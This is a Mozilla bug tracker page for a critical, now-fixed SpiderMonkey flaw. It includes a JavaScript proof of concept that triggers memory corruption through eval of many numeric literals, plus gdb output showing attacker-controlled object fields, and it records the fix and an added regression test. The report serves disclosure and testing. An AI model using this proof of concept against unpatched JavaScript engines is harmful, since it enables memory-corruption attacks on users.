LITOPX DEFFUN is exploitable

VERIFIED FIXED

Status

()

Core
JavaScript Engine
--
critical
VERIFIED FIXED
11 years ago
10 years ago

People

(Reporter: shutdown, Assigned: shutdown)

Tracking

({crash, verified1.8.0.10, verified1.8.1.2})

Trunk
crash, verified1.8.0.10, verified1.8.1.2
Points:
---
Bug Flags:
blocking1.8.1.2 +
blocking1.8.0.10 +
in-testsuite +

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:critical] security tracker for bug 363988)

Attachments

(1 attachment)

(Assignee)

Description

11 years ago
$ cat litopx-deffun-x.txt
function exploit() {
  var code = "";
  for(var i = 0; i < 0x10000; i++) {
    if(i == 125) {
      code += "void 0x10000050505050;\n";
    } else {
      code += "void " + (0x10000000000000 + i) + ";\n";
    }
  }
  code += "function foo() {}\n";
  eval(code);
}
exploit();

$ gdb --eval run --args dbg.obj/js litopx-deffun-x.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x00432d3d in JS_GetPrivate (cx=0xb50750, obj=0x131c620) at jsapi.c:2298
2298        JS_ASSERT(OBJ_GET_CLASS(cx, obj)->flags & JSCLASS_HAS_PRIVATE);
(gdb) print *obj
$1 = {map = 0x50505050, fslots = {1127219200, 126, 1127219200, 127,
    1127219200, 128}, dslots = 0x43300000}

In other words, bug 363988 is exploitable.
Flags: blocking1.8.1.2+
Flags: blocking1.8.0.10+
Whiteboard: [sg:critical] security tracker for bug 363988
shutdown contributed a patch for bug 363988
Assignee: general → shutdown
Fix landed for bug 363988.

/be
Status: NEW → RESOLVED
Last Resolved: 11 years ago
Resolution: --- → FIXED
Keywords: verified1.8.0.10, verified1.8.1.2

Comment 3

10 years ago
Created attachment 251755 [details]
js1_5/Function/regress-364023.js

Updated

10 years ago
Flags: in-testsuite+

Comment 4

10 years ago
verified fixed 1.8.0, 1.8.1, 1.9.0 2007-01-23 win/mac*/linux
Status: RESOLVED → VERIFIED
Group: security

Comment 5

10 years ago
/cvsroot/mozilla/js/tests/js1_5/Function/regress-364023.js,v  <--  regress-364023.js
initial revision: 1.1
You need to log in before you can comment on or make changes to this bug.